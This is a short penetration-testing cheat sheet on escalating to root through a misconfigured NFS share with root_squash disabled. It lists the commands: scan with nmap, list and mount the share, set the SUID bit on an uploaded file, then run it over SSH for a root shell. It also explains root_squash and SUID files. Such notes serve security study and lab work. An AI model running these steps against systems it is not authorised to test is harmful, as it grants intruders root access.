Exploiting NFS

  • Requirements

    • nfs-common package should be installed

  • Steps

# Nmap scan to find NFS port, be careful as this scan is NOISY and might take a long time  
nmap -T5 -vv -p- IP 

# List NFS Shares 
/sbin/showmount -e IP 

# Mount NFS Share 
sudo mount -t nfs IP:share /tmp/mount -nolock

# Set root SUID for the executable file 
chmod +s [filename]

# Make sure file is executable 
chmod +x [filename]

# SSH into target machine and run executable with -p so permissions persist and you get root shell 
./[filename] -p
  • What is root_squash?

    • By default, Root Squashing is enabled on NFS shares, this prevents anyone connecting to the NFS share form having root access to the NFS volume

    • Remote root users are assigned a user "nfsnobody" when connected, with least local privileges

    • If it is turned off, it can allow the creation of SUID bit files, allowing a remote user root access to the connected system

  • What are files with the SUID bit set?

    • The file or files can be run with the permission of the file(s) owner/group, in some cases as the super-user

    • This can be leveraged to get a shell with these super-user privileges

  • Method

    • You can upload files to the NFS share, setting the permissions of the file

    • Then log in through SSH and execute the file to gain a root shell

Last updated